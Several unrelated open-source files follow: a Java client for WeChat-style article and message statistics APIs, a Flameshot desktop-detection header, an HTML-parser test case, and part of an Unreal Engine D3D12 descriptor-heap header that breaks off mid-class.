public void articleTotal(final String date, Callback<List<ArticleTotal>> cb){
articleTotal(loadAccessToken(), date, cb);
}
/**
     * Fetches total article-broadcast data
     * @param accessToken accessToken
     * @param date date
     * @param cb callback
*/
public void articleTotal(final String accessToken, final String date, Callback<List<ArticleTotal>> cb){
doAsync(new AsyncFunction<List<ArticleTotal>>(cb) {
@Override
public List<ArticleTotal> execute() throws Exception {
return articleTotal(accessToken, date);
}
});
}
/**
     * Fetches total article-broadcast data
     * @param accessToken accessToken
     * @param date date
     * @return total article-broadcast data
*/
public List<ArticleTotal> articleTotal(String accessToken, String date){
return doSummary(ARTICLE_TOTAL + accessToken, date, date, ARTICLE_TOTAL_LIST_TYPE);
}
/**
     * Fetches article read statistics (span at most 3 days: endDate - startDate < 3)
     * @param startDate start date
     * @param endDate end date
     * @param cb callback
*/
public void articleSummary(final String startDate, final String endDate, Callback<List<ArticleSummary>> cb){
articleSummary(loadAccessToken(), startDate, endDate, cb);
}
/**
     * Fetches article read statistics (span at most 3 days: endDate - startDate < 3)
     * @param accessToken accessToken
     * @param startDate start date
     * @param endDate end date
     * @param cb callback
*/
public void articleSummary(final String accessToken, final String startDate, final String endDate, Callback<List<ArticleSummary>> cb){
doAsync(new AsyncFunction<List<ArticleSummary>>(cb) {
@Override
public List<ArticleSummary> execute() throws Exception {
return articleSummary(accessToken, startDate, endDate);
}
});
}
/**
     * Fetches article read statistics (span at most 3 days: endDate - startDate < 3)
     * @param startDate start date
     * @param endDate end date
     * @return article read statistics
*/
public List<ArticleSummary> articleSummary(String startDate, String endDate){
return articleSummary(loadAccessToken(), startDate, endDate);
}
/**
     * Fetches article read statistics (span at most 3 days: endDate - startDate < 3)
     * @param accessToken accessToken
     * @param startDate start date
     * @param endDate end date
     * @return article read statistics
*/
public List<ArticleSummary> articleSummary(String accessToken, String startDate, String endDate){
return doSummary(ARTICLE_SUMMARY + accessToken, startDate, endDate, ARTICLE_SUMMARY_LIST_TYPE);
}
/**
     * Fetches hourly article read statistics
     * @param date date
     * @param cb callback
*/
public void articleSummaryHourly(final String date, Callback<List<ArticleSummaryHour>> cb){
articleSummaryHourly(loadAccessToken(), date, cb);
}
/**
     * Fetches hourly article read statistics
     * @param accessToken accessToken
     * @param date date
     * @param cb callback
*/
public void articleSummaryHourly(final String accessToken, final String date, Callback<List<ArticleSummaryHour>> cb){
doAsync(new AsyncFunction<List<ArticleSummaryHour>>(cb) {
@Override
public List<ArticleSummaryHour> execute() throws Exception {
return articleSummaryHourly(accessToken, date);
}
});
}
/**
     * Fetches hourly article read statistics
     * @param date date
     * @return hourly article read statistics
*/
public List<ArticleSummaryHour> articleSummaryHourly(String date){
return articleSummaryHourly(loadAccessToken(), date);
}
/**
     * Fetches hourly article read statistics
     * @param accessToken accessToken
     * @param date date
     * @return hourly article read statistics
*/
public List<ArticleSummaryHour> articleSummaryHourly(String accessToken, String date){
return doSummary(ARTICLE_SUMMARY_HOUR + accessToken, date, date, ARTICLE_SUMMARY_HOUR_LIST_TYPE);
}
/**
     * Fetches article share/forward data (span at most 7 days: endDate - startDate < 7)
     * @param startDate start date
     * @param endDate end date
     * @param cb callback
*/
public void articleShare(final String startDate, final String endDate, Callback<List<ArticleShare>> cb){
articleShare(loadAccessToken(), startDate, endDate, cb);
}
/**
     * Fetches article share/forward data (span at most 7 days: endDate - startDate < 7)
     * @param accessToken accessToken
     * @param startDate start date
     * @param endDate end date
     * @param cb callback
*/
public void articleShare(final String accessToken, final String startDate, final String endDate, Callback<List<ArticleShare>> cb){
doAsync(new AsyncFunction<List<ArticleShare>>(cb) {
@Override
public List<ArticleShare> execute() throws Exception {
return articleShare(accessToken, startDate, endDate);
}
});
}
/**
     * Fetches article share/forward data (span at most 7 days: endDate - startDate < 7)
     * @param startDate start date
     * @param endDate end date
     * @return article share/forward data
*/
public List<ArticleShare> articleShare(String startDate, String endDate){
return articleShare(loadAccessToken(), startDate, endDate);
}
/**
     * Fetches article share/forward data (span at most 7 days: endDate - startDate < 7)
     * @param accessToken accessToken
     * @param startDate start date
     * @param endDate end date
     * @return article share/forward data
*/
public List<ArticleShare> articleShare(String accessToken, String startDate, String endDate){
return doSummary(ARTICLE_SHARE + accessToken, startDate, endDate, ARTICLE_SHARE_LIST_TYPE);
}
/**
     * Fetches hourly article share/forward data
     * @param date date
     * @param cb callback
*/
public void articleShareByHourly(final String date, Callback<List<ArticleShareHour>> cb){
articleShareByHourly(loadAccessToken(), date, cb);
}
/**
     * Fetches hourly article share/forward data
     * @param accessToken accessToken
     * @param date date
     * @param cb callback
*/
public void articleShareByHourly(final String accessToken, final String date, Callback<List<ArticleShareHour>> cb){
doAsync(new AsyncFunction<List<ArticleShareHour>>(cb) {
@Override
public List<ArticleShareHour> execute() throws Exception {
return articleShareByHourly(accessToken, date);
}
});
}
/**
     * Fetches hourly article share/forward data
     * @param date date
     * @return hourly article share/forward data
*/
public List<ArticleShareHour> articleShareByHourly(String date){
return articleShareByHourly(loadAccessToken(), date);
}
/**
     * Fetches hourly article share/forward data
     * @param accessToken accessToken
     * @param date date
     * @return hourly article share/forward data
*/
public List<ArticleShareHour> articleShareByHourly(String accessToken, String date){
return doSummary(ARTICLE_SHARE_HOUR + accessToken, date, date, ARTICLE_SHARE_HOUR_LIST_TYPE);
}
/**
     * Fetches API analysis data (span at most 30 days: endDate - startDate < 30)
     * @param startDate start date
     * @param endDate end date
     * @param cb callback
*/
public void interfaceSummary(final String startDate, final String endDate, Callback< List<InterfaceSummary>> cb){
interfaceSummary(loadAccessToken(), startDate, endDate, cb);
}
/**
     * Fetches API analysis data (span at most 30 days: endDate - startDate < 30)
     * @param accessToken accessToken
     * @param startDate start date
     * @param endDate end date
     * @param cb callback
*/
public void interfaceSummary(final String accessToken, final String startDate, final String endDate, Callback< List<InterfaceSummary>> cb){
doAsync(new AsyncFunction<List<InterfaceSummary>>(cb) {
@Override
public List<InterfaceSummary> execute() throws Exception {
return interfaceSummary(accessToken, startDate, endDate);
}
});
}
/**
     * Fetches API analysis data (span at most 30 days: endDate - startDate < 30)
     * @param startDate start date
     * @param endDate end date
     * @return API analysis data
*/
public List<InterfaceSummary> interfaceSummary(String startDate, String endDate){
return interfaceSummary(loadAccessToken(), startDate, endDate);
}
/**
     * Fetches API analysis data (span at most 30 days: endDate - startDate < 30)
     * @param accessToken accessToken
     * @param startDate start date
     * @param endDate end date
     * @return API analysis data
*/
public List<InterfaceSummary> interfaceSummary(String accessToken, String startDate, String endDate){
return doSummary(INTERFACE_SUMMARY + accessToken, startDate, endDate, INTERFACE_SUMMARY_LIST_TYPE);
}
/**
     * Fetches hourly API analysis data
     * @param date date
     * @param cb callback
*/
public void interfaceSummaryHourly(final String date, Callback<List<InterfaceSummaryHour>> cb){
interfaceSummaryHourly(loadAccessToken(), date, cb);
}
/**
     * Fetches hourly API analysis data
     * @param accessToken accessToken
     * @param date date
     * @param cb callback
*/
public void interfaceSummaryHourly(final String accessToken, final String date, Callback<List<InterfaceSummaryHour>> cb){
doAsync(new AsyncFunction<List<InterfaceSummaryHour>>(cb) {
@Override
public List<InterfaceSummaryHour> execute() throws Exception {
return interfaceSummaryHourly(accessToken, date);
}
});
}
/**
     * Fetches hourly API analysis data
     * @param date date
     * @return hourly API analysis data
*/
public List<InterfaceSummaryHour> interfaceSummaryHourly(String date){
return interfaceSummaryHourly(loadAccessToken(), date);
}
/**
     * Fetches hourly API analysis data
     * @param accessToken accessToken
     * @param date date
     * @return hourly API analysis data
*/
public List<InterfaceSummaryHour> interfaceSummaryHourly(String accessToken, String date){
return doSummary(INTERFACE_SUMMARY_HOUR + accessToken, date, date, INTERFACE_SUMMARY_HOUR_LIST_TYPE);
}
/**
     * Fetches message-send analysis data (span at most 30 days: endDate - startDate < 30)
     * @param startDate start date
     * @param endDate end date
     * @param cb callback
*/
public void msgSendSummary(final String startDate, final String endDate, Callback<List<MsgSendSummary>> cb){
msgSendSummary(loadAccessToken(), startDate, endDate, cb);
}
/**
     * Fetches message-send analysis data (span at most 30 days: endDate - startDate < 30)
     * @param accessToken accessToken
     * @param startDate start date
     * @param endDate end date
     * @param cb callback
*/
public void msgSendSummary(final String accessToken, final String startDate, final String endDate, Callback<List<MsgSendSummary>> cb){
doAsync(new AsyncFunction<List<MsgSendSummary>>(cb) {
@Override
public List<MsgSendSummary> execute() throws Exception {
return msgSendSummary(accessToken, startDate, endDate);
}
});
}
/**
     * Fetches message-send analysis data (span at most 30 days: endDate - startDate < 30)
     * @param startDate start date
     * @param endDate end date
     * @return message-send analysis data
*/
public List<MsgSendSummary> msgSendSummary(String startDate, String endDate){
return msgSendSummary(loadAccessToken(), startDate, endDate);
}
/**
     * Fetches message-send analysis data (span at most 30 days: endDate - startDate < 30)
     * @param accessToken accessToken
     * @param startDate start date
     * @param endDate end date
     * @return message-send analysis data
*/
public List<MsgSendSummary> msgSendSummary(String accessToken, String startDate, String endDate){
return doSummary(MSG_SEND_SUMMARY + accessToken, startDate, endDate, MSG_SEND_SUMMARY_LIST_TYPE);
}
/**
     * Fetches hourly message-send analysis data
     * @param date date
     * @param cb callback
*/
public void msgSendSummaryHourly(final String date, Callback<List<MsgSendSummaryHour>> cb){
msgSendSummaryHourly(loadAccessToken(), date, cb);
}
/**
     * Fetches hourly message-send analysis data
     * @param accessToken accessToken
     * @param date date
     * @param cb callback
*/
public void msgSendSummaryHourly(final String accessToken, final String date, Callback<List<MsgSendSummaryHour>> cb){
doAsync(new AsyncFunction<List<MsgSendSummaryHour>>(cb) {
@Override
public List<MsgSendSummaryHour> execute() throws Exception {
return msgSendSummaryHourly(accessToken, date);
}
});
}
/**
     * Fetches hourly message-send analysis data
     * @param date date
     * @return hourly message-send analysis data
*/
public List<MsgSendSummaryHour> msgSendSummaryHourly(String date){
return msgSendSummaryHourly(loadAccessToken(), date);
}
/**
     * Fetches hourly message-send analysis data
     * @param accessToken accessToken
     * @param date date
     * @return hourly message-send analysis data
*/
public List<MsgSendSummaryHour> msgSendSummaryHourly(String accessToken, String date){
return doSummary(MSG_SEND_SUMMARY_HOUR + accessToken, date, date, MSG_SEND_SUMMARY_HOUR_LIST_TYPE);
}
/**
     * Fetches weekly message-send analysis data (span at most 30 days: endDate - startDate < 30)
     * @param startDate start date
     * @param endDate end date
     * @param cb callback
*/
public void msgSendSummaryWeekly(final String startDate, final String endDate, Callback<List<MsgSendSummary>> cb){
msgSendSummaryWeekly(loadAccessToken(), startDate, endDate, cb);
}
/**
     * Fetches weekly message-send analysis data (span at most 30 days: endDate - startDate < 30)
     * @param accessToken accessToken
     * @param startDate start date
     * @param endDate end date
     * @param cb callback
*/
public void msgSendSummaryWeekly(final String accessToken, final String startDate, final String endDate, Callback<List<MsgSendSummary>> cb){
doAsync(new AsyncFunction<List<MsgSendSummary>>(cb) {
@Override
public List<MsgSendSummary> execute() throws Exception {
                return msgSendSummaryWeekly(accessToken, startDate, endDate);
}
});
}
/**
     * Fetches weekly message-send analysis data (span at most 30 days: endDate - startDate < 30)
     * @param startDate start date
     * @param endDate end date
     * @return weekly message-send analysis data
*/
public List<MsgSendSummary> msgSendSummaryWeekly(String startDate, String endDate){
return msgSendSummaryWeekly(loadAccessToken(), startDate, endDate);
}
/**
     * Fetches weekly message-send analysis data (span at most 30 days: endDate - startDate < 30)
     * @param accessToken accessToken
     * @param startDate start date
     * @param endDate end date
     * @return weekly message-send analysis data
*/
public List<MsgSendSummary> msgSendSummaryWeekly(String accessToken, String startDate, String endDate){
return doSummary(MSG_SEND_SUMMARY_WEEK + accessToken, startDate, endDate, MSG_SEND_SUMMARY_LIST_TYPE);
}
/**
     * Fetches monthly message-send analysis data (span at most 30 days: endDate - startDate < 30)
     * @param startDate start date
     * @param endDate end date
     * @param cb callback
*/
public void msgSendSummaryMonthly(final String startDate, final String endDate, Callback<List<MsgSendSummary>> cb){
msgSendSummaryMonthly(loadAccessToken(), startDate, endDate, cb);
}
/**
     * Fetches monthly message-send analysis data (span at most 30 days: endDate - startDate < 30)
     * @param accessToken accessToken
     * @param startDate start date
     * @param endDate end date
     * @param cb callback
*/
public void msgSendSummaryMonthly(final String accessToken, final String startDate, final String endDate, Callback<List<MsgSendSummary>> cb){
doAsync(new AsyncFunction<List<MsgSendSummary>>(cb) {
@Override
public List<MsgSendSummary> execute() throws Exception {
return msgSendSummaryMonthly(accessToken, startDate, endDate);
}
});
}
/**
     * Fetches monthly message-send analysis data (span at most 30 days: endDate - startDate < 30)
     * @param startDate start date
     * @param endDate end date
     * @return monthly message-send analysis data
*/
public List<MsgSendSummary> msgSendSummaryMonthly(String startDate, String endDate){
return msgSendSummaryMonthly(loadAccessToken(), startDate, endDate);
}
/**
     * Fetches monthly message-send analysis data (span at most 30 days: endDate - startDate < 30)
     * @param accessToken accessToken
     * @param startDate start date
     * @param endDate end date
     * @return monthly message-send analysis data
*/
public List<MsgSendSummary> msgSendSummaryMonthly(String accessToken, String startDate, String endDate){
return doSummary(MSG_SEND_SUMMARY_MONTH + accessToken, startDate, endDate, MSG_SEND_SUMMARY_LIST_TYPE);
}
/**
     * Fetches message-send distribution data (span at most 15 days: endDate - startDate < 15)
     * @param accessToken accessToken
     * @param startDate start date
     * @param endDate end date
     * @param cb callback
*/
public void msgSendDist(final String accessToken, final String startDate, final String endDate, Callback<List<MsgSendDist>> cb){
doAsync(new AsyncFunction<List<MsgSendDist>>(cb) {
@Override
public List<MsgSendDist> execute() throws Exception {
return msgSendDist(accessToken, startDate, endDate);
}
});
}
/**
     * Fetches message-send distribution data (span at most 15 days: endDate - startDate < 15)
     * @param startDate start date
     * @param endDate end date
     * @param cb callback
*/
public void msgSendDist(final String startDate, final String endDate, Callback<List<MsgSendDist>> cb){
msgSendDist(loadAccessToken(), startDate, endDate, cb);
}
/**
     * Fetches message-send distribution data (span at most 15 days: endDate - startDate < 15)
     * @param startDate start date
     * @param endDate end date
     * @return message-send distribution data
*/
public List<MsgSendDist> msgSendDist(String startDate, String endDate){
return msgSendDist(loadAccessToken(), startDate, endDate);
}
/**
     * Fetches message-send distribution data (span at most 15 days: endDate - startDate < 15)
     * @param accessToken accessToken
     * @param startDate start date
     * @param endDate end date
     * @return message-send distribution data
*/
public List<MsgSendDist> msgSendDist(String accessToken, String startDate, String endDate){
return doSummary(MSG_SEND_DIST + accessToken, startDate, endDate, MSG_SEND_DIST_LIST_TYPE);
}
/**
     * Fetches weekly message-send distribution data (span at most 30 days: endDate - startDate < 30)
     * @param startDate start date
     * @param endDate end date
     * @return weekly message-send distribution data
*/
public List<MsgSendDist> msgSendDistWeekly(String startDate, String endDate){
return msgSendDistWeekly(loadAccessToken(), startDate, endDate);
}
/**
     * Fetches weekly message-send distribution data (span at most 30 days: endDate - startDate < 30)
     * @param startDate start date
     * @param endDate end date
     * @param cb callback
*/
public void msgSendDistWeekly(final String startDate, final String endDate, Callback<List<MsgSendDist>> cb){
msgSendDistWeekly(loadAccessToken(), startDate, endDate, cb);
}
/**
     * Fetches weekly message-send distribution data (span at most 30 days: endDate - startDate < 30)
     * @param accessToken accessToken
     * @param startDate start date
     * @param endDate end date
     * @param cb callback
*/
public void msgSendDistWeekly(final String accessToken, final String startDate, final String endDate, Callback<List<MsgSendDist>> cb){
doAsync(new AsyncFunction<List<MsgSendDist>>(cb) {
@Override
public List<MsgSendDist> execute() throws Exception {
return msgSendDistWeekly(accessToken, startDate, endDate);
}
});
}
/**
     * Fetches weekly message-send distribution data (span at most 30 days: endDate - startDate < 30)
     * @param accessToken accessToken
     * @param startDate start date
     * @param endDate end date
     * @return weekly message-send distribution data
*/
public List<MsgSendDist> msgSendDistWeekly(String accessToken, String startDate, String endDate){
return doSummary(MSG_SEND_SUMMARY_DIST_WEEK + accessToken, startDate, endDate, MSG_SEND_DIST_LIST_TYPE);
}
/**
     * Fetches monthly message-send distribution data (span at most 30 days: endDate - startDate < 30)
     * @param startDate start date
     * @param endDate end date
     * @return monthly message-send distribution data
*/
public List<MsgSendDist> msgSendDistMonthly(String startDate, String endDate){
return msgSendDistMonthly(loadAccessToken(), startDate, endDate);
}
/**
     * Fetches monthly message-send distribution data (span at most 30 days: endDate - startDate < 30)
     * @param startDate start date
     * @param endDate end date
     * @param cb callback
*/
public void msgSendDistMonthly(final String startDate, final String endDate, Callback<List<MsgSendDist>> cb){
msgSendDistMonthly(loadAccessToken(), startDate, endDate, cb);
}
/**
     * Fetches monthly message-send distribution data (span at most 30 days: endDate - startDate < 30)
     * @param accessToken accessToken
     * @param startDate start date
     * @param endDate end date
     * @param cb callback
*/
public void msgSendDistMonthly(final String accessToken, final String startDate, final String endDate, Callback<List<MsgSendDist>> cb){
doAsync(new AsyncFunction<List<MsgSendDist>>(cb) {
@Override
public List<MsgSendDist> execute() throws Exception {
return msgSendDistMonthly(accessToken, startDate, endDate);
}
});
}
/**
     * Fetches monthly message-send distribution data (span at most 30 days: endDate - startDate < 30)
     * @param accessToken accessToken
     * @param startDate start date
     * @param endDate end date
     * @return monthly message-send distribution data
*/
public List<MsgSendDist> msgSendDistMonthly(String accessToken, String startDate, String endDate){
return doSummary(MSG_SEND_SUMMARY_DIST_MONTH + accessToken, startDate, endDate, MSG_SEND_DIST_LIST_TYPE);
}
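    /**
     * Shared helper: POSTs a {begin_date, end_date} body to the given datacube
     * URL and maps the "list" field of the JSON response to the requested type.
     */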
private <T> List<T> doSummary(String url, String startDate, String endDate, JavaType type){
checkNotNullAndEmpty(startDate, "startDate");
checkNotNullAndEmpty(endDate, "endDate");
Map<String, Object> params = buildDateRange(startDate, endDate);
Map<String, Object> resp = doPost(url, params);
return Jsons.DEFAULT.fromJson(Jsons.DEFAULT.toJson(resp.get("list")), type);
}
private Map<String, Object> buildDateRange(String start, String end) {
Map<String, Object> params = Maps.newHashMapWithExpectedSize(2);
params.put("begin_date", start);
params.put("end_date", end);
return params;
}
}
| {
"pile_set_name": "Github"
} |
// Copyright(c) 2017-2019 Alejandro Sirgo Rica & Contributors
//
// This file is part of Flameshot.
//
// Flameshot is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
//
// Flameshot is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with Flameshot. If not, see <http://www.gnu.org/licenses/>.
#pragma once
#include <QString>
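// Lightweight helper that inspects common session environment variables
// (XDG_*, WAYLAND_DISPLAY, KDE/GNOME session variables) to detect a Wayland
// session and guess the running window manager.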
class DesktopInfo
{
public:
DesktopInfo();
enum WM
{
GNOME,
KDE,
OTHER
};
bool waylandDectected();
WM windowManager();
private:
QString XDG_CURRENT_DESKTOP;
QString XDG_SESSION_TYPE;
QString WAYLAND_DISPLAY;
QString KDE_FULL_SESSION;
QString GNOME_DESKTOP_SESSION_ID;
QString GDMSESSION;
QString DESKTOP_SESSION;
};
| {
"pile_set_name": "Github"
} |
{
"name": "Text outside tags",
"options": {
"handler": {},
"parser": {}
},
"html": "Line one\n<br>\nline two",
"expected": [
{
"data": "Line one\n",
"type": "text"
},
{
"type": "tag",
"name": "br",
"attribs": {}
},
{
"data": "\nline two",
"type": "text"
}
]
}
| {
"pile_set_name": "Github"
} |
// Copyright 1998-2017 Epic Games, Inc. All Rights Reserved.
/*=============================================================================
D3D12DescriptorCache.h: D3D12 State application functionality
=============================================================================*/
#pragma once
class FD3D12DynamicRHI;
struct FD3D12VertexBufferCache;
struct FD3D12IndexBufferCache;
struct FD3D12ConstantBufferCache;
struct FD3D12ShaderResourceViewCache;
struct FD3D12UnorderedAccessViewCache;
struct FD3D12SamplerStateCache;
// Like a TMap<KeyType, ValueType>
// Faster lookup performance, but possibly has false negatives
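// A colliding Add() simply overwrites the slot its key hashes to, so a later
// Find() for the evicted key returns nullptr (false negative); a hit, however,
// always returns the value stored for that exact key.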
template<typename KeyType, typename ValueType>
class FD3D12ConservativeMap
{
public:
FD3D12ConservativeMap(uint32 Size)
{
Table.AddUninitialized(Size);
Reset();
}
void Add(const KeyType& Key, const ValueType& Value)
{
uint32 Index = GetIndex(Key);
Entry& Pair = Table[Index];
Pair.Valid = true;
Pair.Key = Key;
Pair.Value = Value;
}
ValueType* Find(const KeyType& Key)
{
uint32 Index = GetIndex(Key);
Entry& Pair = Table[Index];
if (Pair.Valid &&
(Pair.Key == Key))
{
return &Pair.Value;
}
else
{
return nullptr;
}
}
void Reset()
{
for (int32 i = 0; i < Table.Num(); i++)
{
Table[i].Valid = false;
}
}
private:
uint32 GetIndex(const KeyType& Key)
{
uint32 Hash = GetTypeHash(Key);
return Hash % static_cast<uint32>(Table.Num());
}
struct Entry
{
bool Valid;
KeyType Key;
ValueType Value;
};
TArray<Entry> Table;
};
uint32 GetTypeHash(const D3D12_SAMPLER_DESC& Desc);
struct FD3D12SamplerArrayDesc
{
uint32 Count;
uint16 SamplerID[16];
inline bool operator==(const FD3D12SamplerArrayDesc& rhs) const
{
check(Count <= _countof(SamplerID));
check(rhs.Count <= _countof(rhs.SamplerID));
if (Count != rhs.Count)
{
return false;
}
else
{
// It is safe to compare pointers, because samplers are kept alive for the lifetime of the RHI
return 0 == FMemory::Memcmp(SamplerID, rhs.SamplerID, sizeof(SamplerID[0]) * Count);
}
}
};
uint32 GetTypeHash(const FD3D12SamplerArrayDesc& Key);
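// Conservative cache from a sampler-array description to the GPU descriptor
// handle of its table in the online sampler heap.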
typedef FD3D12ConservativeMap<FD3D12SamplerArrayDesc, D3D12_GPU_DESCRIPTOR_HANDLE> FD3D12SamplerMap;
template< uint32 CPUTableSize>
struct FD3D12UniqueDescriptorTable
{
FD3D12UniqueDescriptorTable() : GPUHandle({}) {};
FD3D12UniqueDescriptorTable(FD3D12SamplerArrayDesc KeyIn, CD3DX12_CPU_DESCRIPTOR_HANDLE* Table) : GPUHandle({})
{
		FMemory::Memcpy(&Key, &KeyIn, sizeof(Key)); // Memcpy to avoid alignment issues
FMemory::Memcpy(CPUTable, Table, Key.Count * sizeof(CD3DX12_CPU_DESCRIPTOR_HANDLE));
}
FORCEINLINE uint32 GetTypeHash(const FD3D12UniqueDescriptorTable& Table)
{
return uint32(FD3D12PipelineStateCache::HashData((void*)Table.Key.SamplerID, Table.Key.Count * sizeof(Table.Key.SamplerID[0])));
}
FD3D12SamplerArrayDesc Key;
CD3DX12_CPU_DESCRIPTOR_HANDLE CPUTable[MAX_SAMPLERS];
// This will point to the table start in the global heap
D3D12_GPU_DESCRIPTOR_HANDLE GPUHandle;
};
template<typename FD3D12UniqueDescriptorTable, bool bInAllowDuplicateKeys = false>
struct FD3D12UniqueDescriptorTableKeyFuncs : BaseKeyFuncs<FD3D12UniqueDescriptorTable, FD3D12UniqueDescriptorTable, bInAllowDuplicateKeys>
{
typedef typename TCallTraits<FD3D12UniqueDescriptorTable>::ParamType KeyInitType;
typedef typename TCallTraits<FD3D12UniqueDescriptorTable>::ParamType ElementInitType;
/**
* @return The key used to index the given element.
*/
static FORCEINLINE KeyInitType GetSetKey(ElementInitType Element)
{
return Element;
}
/**
* @return True if the keys match.
*/
static FORCEINLINE bool Matches(KeyInitType A, KeyInitType B)
{
return A.Key == B.Key;
}
/** Calculates a hash index for a key. */
static FORCEINLINE uint32 GetKeyHash(KeyInitType Key)
{
return GetTypeHash(Key.Key);
}
};
typedef FD3D12UniqueDescriptorTable<MAX_SAMPLERS> FD3D12UniqueSamplerTable;
typedef TSet<FD3D12UniqueSamplerTable, FD3D12UniqueDescriptorTableKeyFuncs<FD3D12UniqueSamplerTable>> FD3D12SamplerSet;
class FD3D12DescriptorCache;
class FD3D12OfflineDescriptorManager : public FD3D12SingleNodeGPUObject
{
public: // Types
typedef D3D12_CPU_DESCRIPTOR_HANDLE HeapOffset;
typedef decltype(HeapOffset::ptr) HeapOffsetRaw;
typedef uint32 HeapIndex;
private: // Types
struct SFreeRange { HeapOffsetRaw Start; HeapOffsetRaw End; };
struct SHeapEntry
{
TRefCountPtr<ID3D12DescriptorHeap> m_Heap;
TDoubleLinkedList<SFreeRange> m_FreeList;
SHeapEntry() { }
};
typedef TArray<SHeapEntry> THeapMap;
static D3D12_DESCRIPTOR_HEAP_DESC CreateDescriptor(GPUNodeMask Node, D3D12_DESCRIPTOR_HEAP_TYPE Type, uint32 NumDescriptorsPerHeap)
{
D3D12_DESCRIPTOR_HEAP_DESC Desc = {};
Desc.Type = Type;
Desc.NumDescriptors = NumDescriptorsPerHeap;
		Desc.Flags = D3D12_DESCRIPTOR_HEAP_FLAG_NONE; // None as this heap is offline
Desc.NodeMask = Node;
return Desc;
}
public: // Methods
FD3D12OfflineDescriptorManager(GPUNodeMask Node, D3D12_DESCRIPTOR_HEAP_TYPE Type, uint32 NumDescriptorsPerHeap)
: m_Desc(CreateDescriptor(Node, Type, NumDescriptorsPerHeap))
, m_DescriptorSize(0)
, m_pDevice(nullptr)
, FD3D12SingleNodeGPUObject(Node)
{}
void Init(ID3D12Device* pDevice)
{
m_pDevice = pDevice;
m_DescriptorSize = pDevice->GetDescriptorHandleIncrementSize(m_Desc.Type);
}
HeapOffset AllocateHeapSlot(HeapIndex &outIndex)
{
FScopeLock Lock(&CritSect);
if (0 == m_FreeHeaps.Num())
{
AllocateHeap();
}
check(0 != m_FreeHeaps.Num());
auto Head = m_FreeHeaps.GetHead();
outIndex = Head->GetValue();
SHeapEntry &HeapEntry = m_Heaps[outIndex];
check(0 != HeapEntry.m_FreeList.Num());
SFreeRange &Range = HeapEntry.m_FreeList.GetHead()->GetValue();
HeapOffset Ret = { Range.Start };
Range.Start += m_DescriptorSize;
if (Range.Start == Range.End)
{
HeapEntry.m_FreeList.RemoveNode(HeapEntry.m_FreeList.GetHead());
if (0 == HeapEntry.m_FreeList.Num())
{
m_FreeHeaps.RemoveNode(Head);
}
}
return Ret;
}
void FreeHeapSlot(HeapOffset Offset, HeapIndex index)
{
FScopeLock Lock(&CritSect);
SHeapEntry &HeapEntry = m_Heaps[index];
SFreeRange NewRange =
{
Offset.ptr,
Offset.ptr + m_DescriptorSize
};
bool bFound = false;
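		// Walk the address-sorted free list and try to coalesce the freed slot
		// with an adjacent range; otherwise insert it as a new single-slot range.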
for (auto Node = HeapEntry.m_FreeList.GetHead();
Node != nullptr && !bFound;
Node = Node->GetNextNode())
{
SFreeRange &Range = Node->GetValue();
check(Range.Start < Range.End);
if (Range.Start == Offset.ptr + m_DescriptorSize)
{
Range.Start = Offset.ptr;
bFound = true;
}
else if (Range.End == Offset.ptr)
{
Range.End += m_DescriptorSize;
bFound = true;
}
else
{
check(Range.End < Offset.ptr || Range.Start > Offset.ptr);
if (Range.Start > Offset.ptr)
{
HeapEntry.m_FreeList.InsertNode(NewRange, Node);
bFound = true;
}
}
}
if (!bFound)
{
if (0 == HeapEntry.m_FreeList.Num())
{
m_FreeHeaps.AddTail(index);
}
HeapEntry.m_FreeList.AddTail(NewRange);
}
}
private: // Methods
void AllocateHeap()
{
TRefCountPtr<ID3D12DescriptorHeap> Heap;
VERIFYD3D12RESULT(m_pDevice->CreateDescriptorHeap(&m_Desc, IID_PPV_ARGS(Heap.GetInitReference())));
SetName(Heap, L"FD3D12OfflineDescriptorManager Descriptor Heap");
HeapOffset HeapBase = Heap->GetCPUDescriptorHandleForHeapStart();
check(HeapBase.ptr != 0);
// Allocate and initialize a single new entry in the map
m_Heaps.SetNum(m_Heaps.Num() + 1);
SHeapEntry& HeapEntry = m_Heaps.Last();
HeapEntry.m_FreeList.AddTail({ HeapBase.ptr,
HeapBase.ptr + m_Desc.NumDescriptors * m_DescriptorSize });
HeapEntry.m_Heap = Heap;
m_FreeHeaps.AddTail(m_Heaps.Num() - 1);
}
private: // Members
const D3D12_DESCRIPTOR_HEAP_DESC m_Desc;
uint32 m_DescriptorSize;
ID3D12Device* m_pDevice; // weak-ref
THeapMap m_Heaps;
TDoubleLinkedList<HeapIndex> m_FreeHeaps;
FCriticalSection CritSect;
};
class FD3D12OnlineHeap : public FD3D12DeviceChild, public FD3D12SingleNodeGPUObject
{
public:
FD3D12OnlineHeap(FD3D12Device* Device, GPUNodeMask Node, bool CanLoopAround, FD3D12DescriptorCache* _Parent = nullptr);
virtual ~FD3D12OnlineHeap() { }
FORCEINLINE D3D12_CPU_DESCRIPTOR_HANDLE GetCPUSlotHandle(uint32 Slot) const { return{ CPUBase.ptr + Slot * DescriptorSize }; }
FORCEINLINE D3D12_GPU_DESCRIPTOR_HANDLE GetGPUSlotHandle(uint32 Slot) const { return{ GPUBase.ptr + Slot * DescriptorSize }; }
inline const uint32 GetDescriptorSize() const { return DescriptorSize; }
const D3D12_DESCRIPTOR_HEAP_DESC& GetDesc() const { return Desc; }
// Call this to reserve descriptor heap slots for use by the command list you are currently recording. This will wait if
// necessary until slots are free (if they are currently in use by another command list.) If the reservation can be
// fulfilled, the index of the first reserved slot is returned (all reserved slots are consecutive.) If not, it will
// throw an exception.
bool CanReserveSlots(uint32 NumSlots);
uint32 ReserveSlots(uint32 NumSlotsRequested);
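	// Typical call pattern (sketch only): check CanReserveSlots(N) first and
	// trigger RollOver() on exhaustion, then ReserveSlots(N) for the base slot.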
void SetNextSlot(uint32 NextSlot);
ID3D12DescriptorHeap* GetHeap() { return Heap.GetReference(); }
void SetParent(FD3D12DescriptorCache* InParent) { Parent = InParent; }
// Roll over behavior depends on the heap type
virtual bool RollOver() = 0;
virtual void NotifyCurrentCommandList(const FD3D12CommandListHandle& CommandListHandle);
virtual uint32 GetTotalSize()
{
return Desc.NumDescriptors;
}
static const uint32 HeapExhaustedValue = uint32(-1);
protected:
FD3D12DescriptorCache* Parent;
FD3D12CommandListHandle CurrentCommandList;
// Handles for manipulation of the heap
